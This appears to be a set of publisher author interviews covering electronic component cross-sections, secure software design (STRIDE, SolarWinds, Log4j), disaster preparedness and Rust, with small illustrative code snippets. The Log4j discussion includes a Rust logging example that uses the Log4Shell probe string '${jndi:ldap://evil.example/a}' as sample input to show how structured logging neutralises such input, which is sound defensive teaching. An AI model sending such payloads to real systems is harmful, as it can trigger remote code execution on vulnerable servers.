ES: There were many challenges. For me, the most difficult challenge was preparing the samples—it took a really long time to prepare each one, taking care to create a polished section with no scratches or blemishes, and being careful to remove every speck of dust.

WO: At one point we realized that we would have to cull the weakest subjects from our draft. We ended up deleting about a dozen—some quite interesting and beautiful—along with their descriptive text. The book is stronger as a whole because we did so, but it really stung at the time. Fine-tuning our text was also difficult in places. For a number of subjects, we only had a few sentences in which to flesh out subtle concepts clearly, to an audience composed of both laypeople and engineers.

 

NSP: How did you divide up all of the labor that the book entailed? I mean, you had to find hundreds of tiny electronic components, carefully cut them in half, photograph them, write the accompanying text for each page—the list goes on and on!

ES: Windell took on the photography and some of the sample preparation, introducing me to some more professional tools that I hadn’t used before. We spent time searching the local electronics surplus store for potential subjects, and I made a lot of exploratory cuts to see if a particular component would be good enough for the book. I’d say the writing was a 50/50 split—we spent so much time writing and editing over video chat that I wouldn’t be able to point to any sentence and definitively say “I wrote this.”

WO: In addition to the bulk of the cutting and sample preparation, Eric also drew the rough drafts of all of the illustrations and wrote the initial drafts of some of the most challenging subjects to describe. I took the photographs, fine-tuned the illustrations, and designed the initial page layout so that we could understand how much text could be paired with each photographic subject. And as Eric said, we worked together closely through all of the writing and editorial choices.

 

NSP: Eric—what was the hardest thing to cross-section, and how did you eventually make it work?

ES: The most challenging was the cathode ray tube (page 186). Windell had the idea to cut it on the slow-speed saw so we could remove the electron gun. I sectioned the glass envelope and the electron gun separately—each of those took several hours to wet sand. The parts were simply too fragile to section any other way. Cleaning the sectioned electron gun was difficult because of the small magnet inside, which vacuumed up the debris created during sanding.

 

NSP: Windell—unlike a cross-section illustration, capturing everything inside an object in a single photographic frame had to be difficult at times. Can you give us some examples where you had to get creative to get the shot?

WO: One of the basic limitations that you can run into with macro photography is the limited depth of field—only a very narrow slice of the view is in focus at any given time. We used focus-stacking software to digitally combine pictures taken at different camera positions, stitching them together like a panorama where the entire subject is sharp and in focus. The circuit-board photograph on the front cover of the book was taken this way. Other times, the subject itself can just be plain hard to photograph.
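For readers curious about the mechanics, the core of focus stacking is simple to sketch. The following NumPy snippet is my own rough illustration of the idea, not the actual software used for the book: score per-pixel sharpness in each frame with a Laplacian filter, then keep, at every pixel, the value from whichever frame is sharpest there.

```python
import numpy as np

def laplacian(img):
    """Per-pixel sharpness score from a 3x3 Laplacian filter."""
    k = np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]], dtype=float)
    padded = np.pad(img, 1, mode="edge")
    h, w = img.shape
    out = np.zeros(img.shape, dtype=float)
    for dy in range(3):
        for dx in range(3):
            out += k[dy, dx] * padded[dy:dy + h, dx:dx + w]
    return np.abs(out)

def focus_stack(frames):
    """At each pixel, take the value from whichever frame is sharpest there."""
    sharpness = np.stack([laplacian(f) for f in frames])
    best = np.argmax(sharpness, axis=0)   # per-pixel index of the sharpest frame
    stacked = np.stack(frames)
    rows, cols = np.indices(best.shape)
    return stacked[best, rows, cols]
```

Real focus-stacking software also aligns the frames and smooths the selection map to avoid visible seams; this sketch skips both steps.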

For some of the LEDs, like the surface-mount LED on page 90, we took photos at different exposure levels and composited them (in a basic HDR—high dynamic range—process) so that you can see detail even in the brightly lit LED. For the color sensor on page 81, the photos came out drab until we added an additional light source at just the right position and brightness so that you could see the additional reflection.
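The exposure-compositing step Windell describes can likewise be sketched in a few lines. This is a simplified exposure-fusion weighting of my own, not the process used for the book's photos: each frame's pixels are weighted by how close they sit to mid-gray, so blown-out highlights and crushed shadows contribute little to the blend.

```python
import numpy as np

def exposure_fuse(frames, sigma=0.2):
    """Blend differently exposed frames, favoring well-exposed pixels.

    Pixel values are assumed normalized to [0, 1]; weights peak at
    mid-gray (0.5) and fall off for very dark or very bright pixels.
    """
    frames = np.stack([f.astype(float) for f in frames])
    weights = np.exp(-((frames - 0.5) ** 2) / (2 * sigma ** 2))
    weights /= weights.sum(axis=0, keepdims=True)  # normalize per pixel
    return (weights * frames).sum(axis=0)
```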

 

NSP: How did you decide what samples and images ultimately made it into the book?

ES: During endless hours of video chat we discussed every potential sample and made a highly detailed spreadsheet. We’re both very organized.

WO: Some part of it was determined by which things we could get our hands on—there are probably 50 other things in the spreadsheet that we might have included if we had an example to disassemble. We did skip a number of potential subjects that were too similar to others, too difficult to section, too difficult to photograph, or that were less likely to be of general interest.

 

NSP: Anyone who’s into photography knows that what’s pleasing to the eye is not always pleasing to the lens. Were there any samples that you successfully cross-sectioned but just could not get a good photo of—things you left on the cutting-room floor, as it were?

WO: Yes, there were quite a few actually, including some that we put a lot of time into preparing. A good example is a reed relay, where we just couldn’t get a photo that clearly showed the features that we wanted to highlight.

 

NSP: Given that you both have backgrounds in hardware engineering—and professional tinkering in general—did you know in advance which electronic components would look cool from a cross-cutting perspective, or was there a lot of trial and error? Any surprises along the way, good or bad?

ES: I’ve seen a few component cross sections created for failure-analysis purposes, so I knew about certain components that would look good, but there were definitely a few surprises. We thought an RGB LED would look cool, but after cutting into one, it just didn’t really seem interesting. We took apart a boring-looking gray electronics module that turned out to be a fabulously complex jewel—the isolation amplifier (page 266).

WO: One of my favorites that took some experimentation was the multilayer ceramic capacitor (page 36). There’s never been any mystery about what is in one—stacked layers of metal electrodes—but it took us a lot of experimentation and cutting into different capacitors to find one where you could literally see and count the individual layers. There were definitely real surprises along the way. The way that the rocker DIP switch (page 110) works inside is just stunning elegance.

 

NSP: You include a “Retro Tech” section in the book for your vintage finds, like Nixie tubes, a mercury tilt switch, and even a magnetic tape head. From a purely aesthetic standpoint, which era wins (Old vs. Modern) as far as microscale interior design goes?

ES: They both fascinate me. Vintage components seem warm and natural to me, being made of less processed materials like brass, rubber, mica, and glass. Modern parts have a sort of cold Cartesian precision and a microscopic intricacy.

WO: Modern electronics has so much more to offer in interior design—there’s just so much more inside. If we were talking about exterior design, I’ll pick the vintage. I love all the brass and Bakelite.

 

NSP: Windell, your company’s motto is “Making the World a Better Place, One Evil Mad Scientist at a Time.” If you had to come up with a similar motto for your book, what would it be? I’ll go first: “Making the garage a messier place, one experiment at a time!” . . . I guess what I’m getting at is, what effect do you hope your work in this book has on people? Eric, same question for you.

WO: If the book needed a motto, other than our existing subtitle, I’d pick “Showing you the Hidden Wonders Inside Electronics.” I hope that it inspires people to open up their electronics and look inside. To look at the parts for the little clues about how they’re made, what they’re for, and how they work. To appreciate elegant design, where they weren’t looking for it before.

ES: I want to inflame curiosity. Earlier today my very young nephew was totally absorbed in a copy of the book, asking his mother afterwards if they had any circuits he could play with. The world is a better place with curious people living in it.

 

Redesigning Security with Living Legend Loren Kohnfelder


This month, we continue our Author Spotlight series with an in-depth interview of Loren Kohnfelder—a true icon in the security realm, as well as the author of Designing Secure Software. In the following Q&A, we talk with him about the everlasting usefulness of threat modeling, why APIs are plagued by security issues, the unsolved mysteries of the SolarWinds hack, and what the recent Log4j exploit teaches us about the importance of prioritizing security design reviews.

Cover of Designing Secure Software

Loren Kohnfelder is a highly influential veteran of the security industry, with over 20 years of experience working for companies such as Google and Microsoft—where he program-managed the .NET Framework. At Google, he was a founding member of the Privacy team, performing numerous security design reviews of large-scale commercial platforms and systems. Now retired and based in Hawaii, Loren expands upon his extraordinary contributions to security in his new book, detailing the concepts behind his personal perspective on technology (which can also be found on his blog), timeless insights on building software that's secure by design, and real-world guidance for non-security experts.


No Starch Press: Aloha, Loren! We can’t talk about your new book without acknowledging the colossal impact your security work has had over the past five decades. For one, in your 1978 MIT thesis you invented Public Key Infrastructure (PKI), introducing the concepts of certificates, CRLs, and the model of trust underlying the entire freaking internet. You were also part of the Microsoft team that first applied threat modeling at scale, you co-developed the STRIDE threat-ID model (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of service, and Elevation of privilege), and you helped bake security-design reviews into the development process at Google—all of which are key growth spurts in the evolution of software security.

Speaking of STRIDE, there are a lot of software professionals using the methodology who weren’t even born when you and Praerit Garg first invented it in the late ’90s. Pretty remarkable that something started in the era of desktop computing remains just as relevant in the age of cloud, mobile, and the web. Why do you think it continues to be so effective and seemingly immune from obsolescence?

Loren Kohnfelder: Aloha, Jen! STRIDE turned 23 this month, and the software landscape today is unrecognizable by comparison. Yet, the fundamentals of threat modeling are just as relevant as ever. I think that STRIDE's enduring value is due to its simplicity as an expression of very fundamental threats.

Since those early days, we've gained pervasive internet connectivity, exponential growth in compute power and storage, and cloud computing, and software itself has become vastly more complex. All of these changes have grown the attack surface—plus our greater reliance on digital systems, as well as the massive amounts of data in the world, serves to increase motivation for attackers. For all of these reasons, threat modeling is more important than ever to gain a proactive view of the threat landscape for the best chance of designing, developing, and deploying a secure system.

It's important to note as well that STRIDE never purported to cover every threat software needs to be concerned with, especially now that we have IoT, robots, and self-driving cars that directly act in the world, introducing new potential forms of harm. For applications beyond traditional information processing, it's critical to consider other possible threats for systems interacting with people and machines in powerful ways.
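For readers who haven't worked with STRIDE before, the model is easy to turn into a per-component checklist. The sketch below is my own illustration, not from the book: the category-to-property mapping is the standard one, but the example threats are hypothetical.

```python
# Each STRIDE category paired with the security property it violates
# and an illustrative threat (examples are hypothetical).
STRIDE = {
    "Spoofing":               ("authentication",   "logging in with a stolen session token"),
    "Tampering":              ("integrity",        "modifying a price field in a client request"),
    "Repudiation":            ("non-repudiation",  "denying a transfer because no audit log exists"),
    "Information disclosure": ("confidentiality",  "a stack trace leaking internal paths to users"),
    "Denial of service":      ("availability",     "exhausting a server's connection pool"),
    "Elevation of privilege": ("authorization",    "a regular user reaching an admin-only endpoint"),
}

def checklist(component):
    """Generate one threat-modeling prompt per STRIDE category for a component."""
    return [
        f"{component}: could {category.lower()} (violating {prop}) occur here? e.g., {example}"
        for category, (prop, example) in STRIDE.items()
    ]
```

Walking a system's components through prompts like these is one lightweight way to apply the kind of threat modeling Kohnfelder describes.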

 

NSP: It’s normal for management to tap external security experts to ensure that tech products and systems are safe to deploy—often via a security review prior to release. An essential premise of your book rejects this standard in favor of moving security to the left. What’s wrong with the status quo, why is security by design better for the bottom line, and… are you ever worried that an angry mob of out-of-work security consultants might show up at your door?

LK: No worries at all that software security will be totally solved anytime soon, so there will continue to be strong demand for good minds defending our systems. This is the most challenging topic covered in the book, and my research included discussions with friends doing just that kind of work.

Rather than “reject,” I would say that I'm recommending moving left "in addition to." Here's what I wrote in the book (p. 235) on this: "Specialist consultants should supplement solid in-house security understanding and well-grounded practice, rather than being called in to carry the security burden alone." I don't think that any security consultant has ever concluded a review by saying, "I think I found the last vulnerability in the system!" So let's try to give them more secure software in the first place to review. The two approaches needn't be an either-or decision: the challenge is finding a good balance combining both approaches.

Honestly, I think the experts will appreciate reviewing well-designed systems without low-hanging fruit, so they can really demonstrate their chops by finding the more subtle flaws. In addition, solid design and review documents will provide a very useful map guiding their investigations compared to confronting a mass of code.

 

NSP: A point you make in the book is that “software security is at once a logical practice and an art form, one based on intuitive decision making.” This represents a paradigm shift for most developers, who tend to focus on “typical” use cases during the design phase—in other words, they presume the end product will be used as intended. You propose that they should actually be doing the opposite, that having a “security mindset” means looking at software and systems the way an attacker would. For those daunted by the prospect, can you explain what this means in practice?

LK: You have put your finger on the specific stretch that I'm inviting developers to make, and while the security mindset is a new perspective, I would say that it's more subtle than difficult. Having a security mindset involves seeing how unexpected actions might have surprising outcomes, such as realizing that a paperclip can be bent into a lockpick to open a tumbler lock. Another example from the book is a softball team deviously named "No Game Scheduled"—when the schedule was printed, other teams assumed the name meant that they had a bye, and therefore didn't show, forfeiting the game.

Again, this is a different viewpoint worth considering in addition to, not instead of, the usual one. To help people new to the topic, the book is filled with all kinds of stories and basic examples that illustrate how attackers exploit obscure bugs. Malicious attacks on major systems regularly make the news, and we can decide to anticipate these eventualities throughout the development cycle, or not. It's worth adding that while security pros might be more fluent in the security mindset, the software team members are the ones who know the code inside and out, so with a little practice they are better positioned to identify these potential vulnerabilities.

 

NSP: Let’s talk about the bigger picture for a moment. We’re barely two years out from SolarWinds—one of the most effective cyber-espionage campaigns in history, where a routine software update launched an attack of epic proportions. If anything, it showed that threat actors know exactly how tech companies operate. Not to mention, the malicious code used in the attack was designed to be injected into the platform without arousing the suspicion of the development and build teams, which makes it all the more scary. If you could prescribe an industry-wide approach to preventing similar attacks in the future, what would it be?

LK: SolarWinds was a very sophisticated attack on a complex product, and the public information I've found doesn't provide a complete picture of exactly what actually happened. So my response here is based on a high-level take, not any specifics. First, I'd say that reliance on products like this, that are given broad administrative rights across large systems, puts a lot of high-value eggs in one basket.

I would love to see a detailed design document for the SolarWinds Orion product: did they anticipate potential threats (like what happened), and if so, what mitigations were built in? Publishing designs as a standard practice would give potential customers something substantial to evaluate, to see for themselves what risks products foresee and how they are mitigated. And when this kind of breach occurs, the design serves to guide analysis of events so we can learn how to do better in the future.

NSP: The massive scope of the SolarWinds incident—affecting dozens of companies and federal agencies—was made possible by the use of compromised X.509 certificates and PKI, in that attackers managed to distribute SUNBURST malware using software updates with valid digital signatures. Back in your time at MIT, you became known for defining PKI; today there’s an implication that code signed by software publishers is trustworthy, but in light of SolarWinds this no longer appears to be a safe assumption. Is there a solution to this on the horizon?

LK: I don't think it's possible to "fix" that, because it boils down to trust in the signing party and their competence. For example, if we are signing a contract and a lawyer uses sleight-of-hand to substitute a fraudulent version, I can be deceived into providing a valid legal signature. I don't know exactly what happened at SolarWinds, but they are the ones ultimately responsible for their code-signing key. In hindsight, I wonder if they fully realized how attractive their product could be to a sophisticated threat actor, and if they took the necessary precautions against that—which would be considerable. (For the record, I was not involved in the creation of the X.509 specification.)

Generally speaking, code signing is problematic because if vulnerabilities are found later, the signature remains valid—even though the code is known to be unsafe and no longer trustworthy. Administrators must go beyond checking for valid signatures and also confirm that they have the latest available version before trusting any code, and of course promptly install future updates that fix critical issues.

 

NSP: On that note, the concept of “good enough security” is predicated on the belief that the threat landscape is somehow static in nature. One thing you really stress in the book is the importance of understanding the full range of potential threats to information systems—and that means accepting that there are adversaries out there whose capabilities are higher than the current standards software developers abide by. How can dev and ops teams work together to implement security measures that not only address what is known, but also deal with threats as they evolve over time, so they can stay a step ahead of persistent adversaries?

LK: Just as you say, broad and deep threat-awareness is important as a starting point, and then the really hard part is choosing mitigations and ensuring that they do the job intended. This is a subjective process, and if you really want to stay ahead, as you say, that usually means aggressively mitigating just about every threat that you can identify, so as not to be blindsided.

Excellent point about the dangers of treating the threat landscape as static, and this is also a strong argument for moving left—because the more mitigation you work into the design, the better. (Plus, as the environment evolves, it's very hard to go back to the design for a redo!)

 

NSP: It’s common knowledge that “all software has bugs,” and that a subset of those bugs will be exploitable—ergo, the challenge of secure coding essentially amounts to not introducing flaws that become exploitable vulnerabilities. Seems easy enough! But programmers are only human, and while many of them make the effort to build protection mechanisms that improve safety in, say, the features of APIs, what are some everyday programming pitfalls you see as the root causes of most security failings?

LK: While “all software has bugs” is generally accepted as true, I think the connection to vulnerabilities is too often under-recognized. Instead, it's easy to rationalize lower quality standards since the end product will have bugs anyway. Part III of the book covers many of these common pitfalls in a little over 100 pages, so I won't attempt to summarize it all here.

If your question about root causes goes deeper, asking why programming languages and APIs are so prone to security problems, then I would say it's often simply because the practice of software development goes back before there was much awareness of security. For example, the C language has been profoundly influential, and it's still widely used, but it also gave us arithmetic overflow and buffer overruns. The inventors surely knew about these potential flaws but had no way to imagine the 2022 digital ecosystem, and threats like ransomware. The same goes for APIs, which can fail to anticipate evolving threats and, once distributed, are very hard to fix later.

Another common cause in API design is failing to present a clean interface, in terms of trust relationships and security responsibilities. API providers naturally want to offer lots of features and options, yet this makes the interface complicated to use. Since the implementation behind the API is typically opaque to the caller, it's easy for mistakes to arise. So it's imperative for API documentation to provide clear security commitments, or to detail exactly what precautions callers must take and why. Log4j is a perfect example of this problem: surely most applications reasonably assumed it was safe to log untrusted inputs, but the JNDI feature—which they may not even have been aware of—offered attackers an attractive point of entry.

 

NSP: Since you brought it up, and it sort of ties together everything we’ve been discussing, let’s talk about that Apache Log4j zero-day vulnerability (which continues to make headlines). Here we have a Java-based logging library used by millions of applications, that has a critical flaw described as basically “trivial” to exploit. Why is this bug considered so incredibly severe? And, even though your book was released before the issue was discovered, are there any nuggets of wisdom in it that address this type of issue—or that could help software developers solve the problems that led to it?

LK: Log4j could be the poster child for the importance of security design reviews. Much has been written already by folks who have examined this extensively, but clearly allowing LDAP access via JNDI was a design flaw. Whether the designer(s) recognized the threat or not, mitigated insufficiently, or simply failed to understand the consequences, is hard to say without a design document (much less a review). Skipping secure design and review means missing the best opportunities to catch exactly this sort of vulnerability before it ever gets released in the first place.

This vulnerability is a near-perfect storm because of a combination of factors: it allows remote code execution (RCE) attacks, the vulnerable code is very widely used by Java applications, and as a logging utility it's often exposed to the attack surface. That last point deserves elaboration: attackers often poke at internet-facing interfaces using malformed inputs in hopes of triggering a bug that might be a vulnerability; and developers want to monitor the use of these interfaces, so they log the untrusted input, creating a direct connection to the vulnerable code in Log4j. It so happens that the book includes an example design document for a simple logging system (Appendix A), and that API explicitly uses structured data (as JSON) rather than the kind of strings with escape sequences that got Log4j into trouble.
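Purely as an illustration of that structured-data idea (the function names here are mine, not the API from the book's Appendix A), a logger can escape untrusted input into a JSON string field, so a Log4Shell-style probe string is recorded as inert data rather than interpreted as a lookup directive:

```rust
// Minimal std-only sketch: untrusted input becomes escaped JSON string data.
// Nothing in the log pipeline ever parses or interprets the input's contents.

fn json_escape(s: &str) -> String {
    let mut out = String::new();
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out
}

fn log_event(event: &str, untrusted_input: &str) -> String {
    // The input lands inside a quoted JSON field; there is no template
    // or variable-substitution syntax for an attacker to trigger.
    format!(
        "{{\"event\":\"{}\",\"input\":\"{}\"}}",
        json_escape(event),
        json_escape(untrusted_input)
    )
}

fn main() {
    // The classic Log4Shell probe is logged as plain string data.
    println!("{}", log_event("login_failed", "${jndi:ldap://evil.example/a}"));
}
```

The design choice is that safety falls out of the data model: because the log record has no in-band syntax with special meaning, there is nothing for hostile input to exploit.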

Furthermore, threat modeling and secure software design should have informed all applications using Log4j of the risks involved in logging untrusted inputs. In the book's Afterword, I write about using software bills of materials (which would have identified which applications use Log4j), and the importance of promptly updating dependencies (in this case, the slow response to Log4j is why it's still in the news), just to name a few additional mitigations that’d help. (I posted about Log4j at more length last year when it first became public.)

NSP: Wow, Loren—maybe you should come out of retirement! At the very least, Designing Secure Software should be required reading for everyone in the field, and it’s clearly becoming more urgent with every passing day.

LK: Thanks for your kind words and this opportunity to reflect on current events. The book is my way of stepping out of retirement to share what I've learned in hopes of nudging the industry in some good new directions. I certainly recognize that investing security effort from the design stage runs counter to a lot of prevailing practice, but I've seen it practiced to good effect, and now there's a manual available if anyone wants to try the methodology.

I think that our discussion nicely shows the value of moving beyond reactive security, moving left to be more proactive. The book offers lots of actionable ideas, and it's written for a broad software audience so we can get more developers as well as management, interface designers, and other stakeholders all involved. No doubt security lapses will continue to occur—but when they do, we need more transparency to fully understand exactly what happened and how best to respond, and then to take those learnings and institute the changes necessary to improve in the future.

 

The End Is (Not) Nigh: Disaster Prepping with Michal Zalewski


For our first Author Spotlight interview of 2022, we have illustrious guest Michal Zalewski—world-class security researcher and author of the newly released Practical Doomsday: A User’s Guide to the End of the World. In the following Q&A, we talk with him about taking disaster preparedness back from the fringe, what he's learned from living through numerous calamities, the reason hackers have the edge over doomsday preppers in any real emergency, and why he’s got a solid backup plan “if this whole computer thing turns out to be a passing fad.”

Practical Doomsday cover Michal Zalewski avatar

Michal Zalewski (aka lcamtuf) has been the VP of Security & Privacy Engineering at Snap Inc. since 2018, following an 11-year stint at Google, where he built the product security program and helped set up a seminal bug bounty initiative. Originally hailing from Poland, he kick-started his career with frequent BugTraq posts in the ’90s, and went on to identify and publish research on hundreds of notable security flaws in the browsers and software powering our modern internet. In addition to his influence on the tech industry, Zalewski's known as the developer of the American Fuzzy Lop open-source fuzzer and other tools. He's also the author of two classic security books via No Starch Press, The Tangled Web (2011) and Silence on the Wire (2005), and is a recipient of the prestigious Lifetime Achievement Pwnie Award.


NSP: Gratulacje on your new book, Michal! Suffice it to say, a practical prep guide for doomsday scenarios could not be more timely (...all things considered). You even joke on Twitter that the past few years were an elaborate viral marketing campaign for the book’s release. But in fact, you’ve been writing on this subject since at least 2015. What first lured you into the disaster-preparedness genre?

Michal Zalewski: I keep asking myself the same question! For one, I simply grew up at an interesting time and in an interesting place: in a failed Soviet satellite state going through a period of profound political and economic strife. As a child, I didn’t think of it much, but as an adult, I look at my early years with a degree of terror and awe.

I also have this geeky curiosity about how complex systems work and how they might fail—and to be frank, I can’t quite grasp why we look at this problem so differently in the physical world versus the digital realm. After all, it’s normal to back up our files or use antivirus software; why is it wacky to buy fire extinguishers for one’s home or store several gallons of water and some canned food?

In my mind, risk modeling and common-sense preparations shouldn’t be a political issue and shouldn’t be the domain of people who are convinced that the end is nigh. If anything, having a backup plan is a wonderful way to dispel some of the worries and anxieties of everyday life.
 

NSP: Your personal bio illustrates one of the key points in the book—that disasters are not rare. In addition to growing up in Poland in the '80s, the book also brings up the experience of living through 9/11, the dot-com crash, and the housing crisis of 2008. Would you explain that larger theme within the context of your own trials and tribulations?

MZ: Oh, I don’t want to oversell my life story! My experiences are shared by tens of millions of people around the globe. Countless others have lived through much worse—famine, devastating natural disasters, wars.

I’m going to say one thing, though. Living through a sufficient number of calamities reveals a simple truth: that every generation gets to experience their own “winter of the century,” “recession of the century,” “pandemic of the century,” and so on. And every time, such events catch them off guard.

In most cases, it’s not a matter of life and death; most people make it through recessions, wildfires, and floods. But having a robust plan can make the situation much less stressful, and can make the recovery more certain and more swift.
 

NSP: Most people picture doomsday preppers as ex-military survivalist-types—not a self-described “city-raised computer nerd.” How has your hacker background informed the emergency-preparedness thought process you’re teaching readers in the book?

MZ: If there’s one obvious difference, it’s that in the physical realm, life-threatening incidents are fairly rare. In the world of computing, on the other hand, networks and applications are under constant attack. When you work in this domain, I think you start to appreciate the saying attributed to Mike Tyson: “everyone has a plan until they get punched in the mouth”—that is, theory seldom survives the clash with reality. At the end of the day, the surest way to get through an emergency is to be adaptable and resilient, not to have an impressive stockpile of guns and bushcraft tools.

Another principle I picked up from the world of information security is that there is no limit to how much time, effort, and money you can spend in the pursuit of perfection—but perfection is not necessarily a useful goal. A good preparedness strategy needs to zero in on problems that are important, plausible, and can be addressed in a cost-effective way, without jeopardizing your quality of life should the apocalypse not come.
 

NSP: As a teenager, you became active in Europe’s fledgling infosec community, which led to consulting projects, pentesting gigs and, eventually, a remarkable career in the industry. Based on your own success, what do you think it takes to truly succeed in the infosec field and/or what’s your best career advice for aspiring security researchers?

MZ: I try to be careful with career advice—sometimes, people are successful despite their habits, not because of them. That said, I certainly found it helpful to always approach security in a bottom-up fashion. If you make the effort to understand how the underlying technologies really work, their failure modes become fairly self-evident too.

My best advice for aspiring professionals is different, though: perhaps the most underrated skill in tech is solid writing. That’s because technical prowess alone is not sufficient to succeed—you need to get others on board. I have a short Twitter thread with a handful of tips here.
 

NSP: In addition to your street cred in the security world, you’re credited with (inadvertently) helping hackerdom in another realm entirely—Hollywood. The Matrix Reloaded is lauded as the first major motion picture to accurately portray a hack. More specifically, your hack. For those who haven’t seen it, Trinity uses an Nmap port scan, followed by an SSH exploit to break into a power company and disable the city’s electric grid. In 2001, you discovered the SSH bug being depicted on screen. Can you tell us anything about your vulnerability report being in one of the movie’s most pivotal scenes?

MZ: I wish I had a cool story to tell! I was surprised (and flattered) to see my bug on the big screen. My other cinematic claim to fame is having my fuzzer—American Fuzzy Lop—surface in the TV series Mr. Robot.

Of course, my screen credits pale in comparison with the track record of the aforementioned Nmap tool. The network scanner makes an appearance in at least a dozen films and TV series, reportedly including at least one porn flick.
 

NSP: In an example of life imitating art, the intelligence community has recently sounded the alarm over an “unprecedented” uptick in hackers targeting electric grids. Maybe if the fictional power company in The Matrix Reloaded had someone like you working for them, Trinity’s blackout-inducing exploit would have failed—which raises the question: do you think white-hat hackers could be the answer to the risk that APTs pose to critical infrastructure? Is it as simple as utility providers adopting bug bounty programs, such as the one your team launched at Google a decade ago?

MZ: Bug bounties are a cherry on top for a mature security program: they are a last-resort mechanism to catch a fraction of the mistakes that slip past your internal defenses. But if you’re routinely letting vulnerabilities ship to production and then hoping that talented strangers will catch them all, you’re playing a very dangerous game.

A comprehensive security program starts with minimizing the risk of such mistakes in the first place: building automation that makes it easy to do the right thing and difficult for humans to mess up. The second layer of defense is internal processes for vetting the design and implementation of your systems, and for penetration-testing or fuzzing products before they go out the door.

Still, the problem faced by most utilities isn’t related to any of this: it’s that we have a fairly small pool of infosec talent and that companies are fiercely competing for that talent. The Wyoming Rural Electric Association doesn’t have it easy when even the most junior security engineer can land an interview with Amazon, Goldman Sachs, or SpaceX.
 

NSP: From your early years posting software vulnerabilities on BugTraq, to your research exposing the flawed security models of web browsers, to helping Google build its massive product security program, you've become known as one of the most influential people in infosec. Over the same decades, the internet has gone from a place of dial-up connections and friendly message-boards to a global network that governs nearly every aspect of digital society. Given your unique vantage point in this regard, what do you think is the most pressing challenge in the industry today?

MZ: I'm not an infosec malcontent—I think our industry has made impressive progress when it comes to reasoning about and reducing the risk of most types of security flaws. But as you note, the stakes are getting higher too: nowadays, almost everything is connected to the internet, and even the humble thermostat on your wall might be running more than ten million lines of code. This makes absolute security a rather challenging goal.

In light of this, the two keywords that come to mind are "compartmentalization" and "containment." You have to plan for unavoidable mishaps and must have a way to prevent them from turning into disasters. For enterprises, this may involve dividing systems into smaller, well-understood blocks that can be cordoned off and monitored for anomalies with ease. The technologies and the architecture paradigms that make this possible are still in their infancy, but I think they hold a lot of promise.

Of course, we can practice compartmentalization and containment in everyday life, too. Only so much of your life should depend on the security of a single email provider or a single bank.
 

NSP: Last question! One of the prepper commandments in your book is, simply, “Learn new skills.” Why is this important for building a comprehensive disaster-preparedness plan, and what are some useful secondary skills that you have developed outside of infosec?

MZ: The point I make in the book is that the accelerating pace of technological change means that fewer and fewer jobs are for life. You know, in the 1990s, opening a VHS rental place or a music store was a sound business plan, journalism was a revered and well-paying gig, and the photographic film industry was a behemoth that consumed about a third of the global silver supply. We are probably going to see similar shifts in the coming decades. In particular, I’m not at all convinced that software engineers are still going to be an elite profession in 20-30 years.

It’s hard to predict the future, but it’s possible to hedge our bets—say, by pursuing potentially marketable hobbies on the side. Even if nothing happens, such pursuits are still rewarding on their own. I enjoy woodworking and tinkering with electronics. I could probably turn these hobbies into gainful employment if this whole computer thing turns out to be a passing fad.
 


*Use coupon code SPOTLIGHT30 to get 30% off your order of Practical Doomsday through March 9, 2022.
 

Live Coder Jon Gjengset Gets into the Nitty-Gritty of Rust


Our always fascinating Author Spotlight series continues with Jon Gjengset – author of Rust for Rustaceans. In the following Q&A, we talk with him about what it means to be an intermediate programmer (and when, exactly, you become a Rustacean), how Rust “gives you the hangover first” for your code's own good, why getting over a language's learning curve sure beats reactive development, and how new users can help move the needle toward a better Rust.

Rust for Rustaceans cover Jon Gjengset headshot

A former PhD student in the Parallel and Distributed Operating Systems group at MIT CSAIL, Gjengset is a senior software engineer at Amazon Web Services (AWS), with a background in distributed systems research, web development, system security, and computer networks. At Amazon, his focus is on driving adoption of Rust internally, including building out internal infrastructure as well as interacting with the Rust ecosystem and community. Outside of the 9-to-5, he conducts live coding sessions on YouTube, is working on research related to a new database engine written in Rust, and shares his open-source projects on GitHub and Twitter.


No Starch Press: Congratulations on your new book! Everyone digs the title, Rust for Rustaceans – which is a tad more fitting than its original moniker, Intermediate Rust. I only bring this up because both names speak to who the book is for. Let’s talk about that. What does “intermediate” mean to you in terms of using Rust? Specifically, what gap does your book fill for those who may have finished The Rust Programming Language and are now raring to become *real* Rustaceans?

Jon Gjengset: Thank you! Yeah, I’m pretty happy with the title we went with, because as you’re getting at, the term “intermediate” is not exactly well-defined. In my mind, intermediate encapsulates all of the material that you wouldn’t need to know or feel comfortable digging into as a beginner to the language, but not so advanced that you’ll rarely run into it when you get to writing Rust code in the wild. Or, to phrase it differently, intermediate to me is the union of all the stuff that engineers working with Rust in real situations would pick up and find continuously useful after they’ve read The Rust Programming Language.

I also want to stress that the book is specifically not titled "The Path to Becoming a Rustacean," or anything along those lines. It’s not as though you’re not a real Rustacean until you’ve read this book, or that the knowledge the book contains is something every Rustacean knows. Quite the contrary – in my mind, you are a Rustacean from just before the first time you ask yourself whether you might be one, and it’s at that point you should consider picking up this book, whenever that may be. And for most people, I would imagine that point comes somewhere around two thirds through The Rust Programming Language, assuming you’re trying to actually use the language on the side.
 

NSP: Rust has been voted “the most loved language” on Stack Overflow for six years running. That said, it's also gained a reputation for being harder to learn than other popular languages. What do you tell developers who are competent in, say, Python but hesitant to try Rust because of the perceived learning curve?

JG: Rust is, without a doubt, a more difficult language to learn compared to its various siblings and cousins, especially if you’re coming from a different language that’s not as strict as Rust is. That said, I think it’s not so much Rust that’s hard to learn as it is the principles that Rust forces you to apply to your code. If you’re writing code in Python, to use your example, there are a whole host of problems the language lets you get away with not thinking about – that is, until they come back to bite you later. Whether that comes in the form of bugs due to dynamic typing, concurrency issues that only crop up during heavy load, or performance issues due to lack of careful memory management, you’re doing reactive development. You build something that kind of works first, and then go round and round fixing issues as you discover them.

Rust is different because it forces you to be more proactive. An apt quote from RustConf this year was that Rust “gives you the hangover first” – as a developer you’re forced to make explicit decisions about your program’s runtime behavior, and you’re forced to ensure that fairly large classes of bugs do not exist in your program, all before the compiler will accept your source code as valid. And that’s something developers need to learn, along with the associated skill of debugging at compile time as opposed to at runtime, as they do in other languages.
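A tiny, illustrative sketch of that "hangover first" discipline (the function and data here are made up): a lookup that might fail returns an Option, and the compiler refuses to let you use the value until every case, including absence, is handled explicitly.

```rust
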